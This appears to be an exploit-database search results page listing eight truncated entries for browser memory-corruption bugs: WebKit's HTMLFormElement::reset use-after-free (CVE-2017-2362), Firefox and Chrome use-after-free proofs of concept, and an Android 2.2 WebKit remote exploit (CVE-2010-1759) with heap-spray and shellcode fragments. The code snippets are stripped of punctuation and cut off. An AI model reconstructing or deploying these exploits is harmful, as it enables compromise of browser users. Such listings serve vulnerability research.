8 matches found
Apple WebKit: HTMLFormElement::reset() use-after free(CVE-2017-2362)
PoC: function go output.value = "aaa"; output.appendChildinserteddiv; document.getElementById"output".addEventListener'DOMSubtreeModified', function forvar i=0; i foo Analysis: The bug is in HTMLFormElement::reset function, specifically in this part: for auto& associatedElement :...
Apple WebKit - HTMLFormElement::reset() Use-After Free Exploit
Exploit for macOS platform in category dos / poc function go output.value = "aaa"; output.appendChildinserteddiv; document.getElementById"output".addEventListener'DOMSubtreeModified', function forvar i=0; i foo associatedElement downcastassociatedElement.reset; The issue is that while...
Apple WebKit - HTMLFormElement::reset() Use-After Free
Apple WebKit - HTMLFormElement::reset Use-After Free function go output.value = "aaa"; output.appendChildinserteddiv; document.getElementById"output".addEventListener'DOMSubtreeModified', function forvar i=0; i foo associatedElement downcastassociatedElement.reset; The issue is that while...
Mozilla Firefox < 50.1.0 - Use-After-Free
-- body background-color:lime; font-color:red; ; / Mozilla Firefox 50.1.0 Use-After-Free POC Author: Marcin Ressel Date: 13.01.2017 Vendor Homepage: www.mozilla.org Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/ Version: 50.1.0 Tested on: Windows 7 x64 Firefox 32 && 64 bit CV...
Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use-After-Free (PoC)
Google Chrome 26.0.1410.43 Webkit - OBJECT Element Use-After-Free PoC...
Webkit normalize bug for android 2.2 (CVE-2010-1759)
No description provided by source. !-- CVE-2010-1759 webkit normalize bug Tested on Moto Droidx2 running 2.2. Droidx2 running 2.3 is vulnerable but exploit fails due to non-executable heap. Still working on a way around that : 2.1 - 2.3 emulator. The changes needed are documented in the code. The...
Webkit normalize bug for android 2.2 (CVE-2010-1759)
Exploit for Android platform in category remote exploits LOADING... var elem1 = document.getElementById"test1"; var elem2 = document.getElementById"test2"; var elem3 = document.getElementById"test3"; function spray for var i = 0; i 180000; i++ var s = new Stringunescape"\u0052\u0052"; //...
Webkit Normalize Bug - Android 2.2
LOADING... var elem1 = document.getElementById"test1"; var elem2 = document.getElementById"test2"; var elem3 = document.getElementById"test3"; function spray for var i = 0; i 180000; i++ var s = new Stringunescape"\u0052\u0052"; // "\u0056\u0056" FOR EMULATOR var scode = unescape"\u5200\u5200"; /...